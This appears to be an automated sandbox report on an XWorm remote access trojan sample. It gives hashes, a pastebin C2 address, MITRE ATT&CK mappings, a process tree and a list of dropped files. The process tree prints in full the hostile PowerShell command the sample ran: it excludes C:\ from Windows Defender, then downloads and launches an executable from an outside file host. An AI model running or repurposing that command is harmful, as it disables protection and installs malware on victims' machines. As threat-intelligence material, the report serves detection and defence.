xworm | cdcc31a5e04ae4bf0873bd78a29b69991e3632ec182d4b3ca328bf8071400628

General

Target

New Text Document.ps1
Size

222B
MD5

63029dc164817834daff27ac138a6110
SHA1

4ef3ef55421240d5232c1bad039ae6098ac17067
SHA256

ca18d4af4b98324369c6237d2e13d33f76a12cb4761c9d29ada553f67f38f98e
SHA512

fce9a92796b7a507186c902f1cc9bbac58a18f8cfa07f67638c8215f4f4183d17937bfeb003bc8cb4cb894cc8ba557efb023d91f7e492e64afde895daaf4dcae

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

C2

https://pastebin.com/raw/L3Xphr0J:201770

Attributes

install_file
Prefetch Manager.exe
pastebin_url
https://pastebin.com/raw/L3Xphr0J

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral4/memory/3080-63-0x000000001BBB0000-0x000000001BBBE000-memory.dmp	disable_win_def

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0010000000023a37-50.dat	family_xworm
behavioral4/memory/3080-60-0x0000000000F60000-0x0000000000F76000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	5112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5112	powershell.exe
5112	powershell.exe
4152	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	tmp.exe

Executes dropped EXE 2 IoCs

pid	Process
4348	tmp.exe
3080	chdu.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	pastebin.com
22	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4624	timeout.exe
2788	timeout.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4152	powershell.exe
4152	powershell.exe
5112	powershell.exe
5112	powershell.exe
3080	chdu.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	4348	tmp.exe
Token: SeDebugPrivilege	3080	chdu.exe
Token: SeDebugPrivilege	3080	chdu.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3080	chdu.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4152 wrote to memory of 5112	4152	powershell.exe	84
PID 4152 wrote to memory of 5112	4152	powershell.exe	84
PID 5112 wrote to memory of 4348	5112	powershell.exe	89
PID 5112 wrote to memory of 4348	5112	powershell.exe	89
PID 4348 wrote to memory of 3080	4348	tmp.exe	93
PID 4348 wrote to memory of 3080	4348	tmp.exe	93
PID 4348 wrote to memory of 3112	4348	tmp.exe	94
PID 4348 wrote to memory of 3112	4348	tmp.exe	94
PID 3112 wrote to memory of 4624	3112	cmd.exe	96
PID 3112 wrote to memory of 4624	3112	cmd.exe	96
PID 3080 wrote to memory of 1064	3080	chdu.exe	102
PID 3080 wrote to memory of 1064	3080	chdu.exe	102
PID 1064 wrote to memory of 2788	1064	cmd.exe	104
PID 1064 wrote to memory of 2788	1064	cmd.exe	104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\New Text Document.ps1"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {Add-MpPreference -ExclusionPath 'C:\'; Invoke-WebRequest 'https://file.garden/ZyuCb9V1JUxg3En4/tmp' -OutFile C:\Users\Admin\AppData\Local\Temp\tmp.exe; Start-Process C:\Users\Admin\AppData\Local\Temp\tmp.exe}"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Users\Admin\AppData\Local\Temp\chdu.exe
      "C:\Users\Admin\AppData\Local\Temp\chdu.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDAFE.tmp.bat""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1064
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:2788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7A31.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3112
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dc1x4zoo.oib.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\chdu.exe

Filesize
59KB

MD5
7868c373824e06e1a120d4d89a4ad78d

SHA1
175376c3fc41ff8389984a42a83ff8d07714631e

SHA256
430ea3bd2e16313514e53fed42c14dbcf57ac27f5fc9a39edbe3fe5c15168da4

SHA512
09b55d51f79ed584c8f983eb5cf83f38790b9680c5073f552d672c647387168898c1d2ff3792e574075badb16c74b48f26c232f49caf16966be1e877287ddfcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.exe

Filesize
49KB

MD5
13b33a68348b989164778abd55cf0d25

SHA1
dc455efebd75a1bbc26a1574aa113b6f32fa9e0d

SHA256
58b4b6ef8e2c82a798fee5d29118704f2007a4626aa817b058e0e1d41b4a4537

SHA512
f223b8c197a38f3ece65d55cf161a64d8ba8693e1cbd553ba4a2e1ab396c0722763bf6393721f8ba7a0c23a9593e130f8c32d860eae8558d3f8c16b142716fa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7A31.tmp.bat

Filesize
155B

MD5
9b0032e8feac853f0918f4367f4f21e0

SHA1
4834c4a61777979bce5dfc3733ff14f77197e6f5

SHA256
ef9eea6487db12d1e5a2b164edffac2e4d71b8b810d37a2b7f6d5a58782ce40a

SHA512
cb5e1997edbf2d272b66cca6f5c60d8a41bb7279a8b241d1f41280b444fef01ae636df2d3c24e67bcc7655d124758810d1f0c6c63357bca2bef6cdb2d8387440

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDAFE.tmp.bat

Filesize
156B

MD5
6fc3a0095487d4ea457dff9f5c6449ff

SHA1
8208a52909d79b669fa3e8b538c90f47ed78bd86

SHA256
9b97caa9705d8ec88449ab0a48385d78b5792333c989f8137d59c9f91e57ff0c

SHA512
6d423b37056742fce72242bd8b677e20f6ee56f2769cc9bbae618dd66bc8566aaf57ded51066d310b3bafd8198cc7c43edc91729b5db0885e9508f18b6fff653

Download Submit
memory/3080-63-0x000000001BBB0000-0x000000001BBBE000-memory.dmp

Filesize
56KB

Download
memory/3080-60-0x0000000000F60000-0x0000000000F76000-memory.dmp

Filesize
88KB

Download
memory/4152-45-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/4152-0-0x00007FFD47823000-0x00007FFD47825000-memory.dmp

Filesize
8KB

Download
memory/4152-12-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/4152-11-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/4152-1-0x000001FB71570000-0x000001FB71592000-memory.dmp

Filesize
136KB

Download
memory/4348-40-0x00000000005B0000-0x00000000005C2000-memory.dmp

Filesize
72KB

Download
memory/5112-26-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/5112-41-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/5112-25-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/5112-24-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/5112-23-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download
memory/5112-22-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing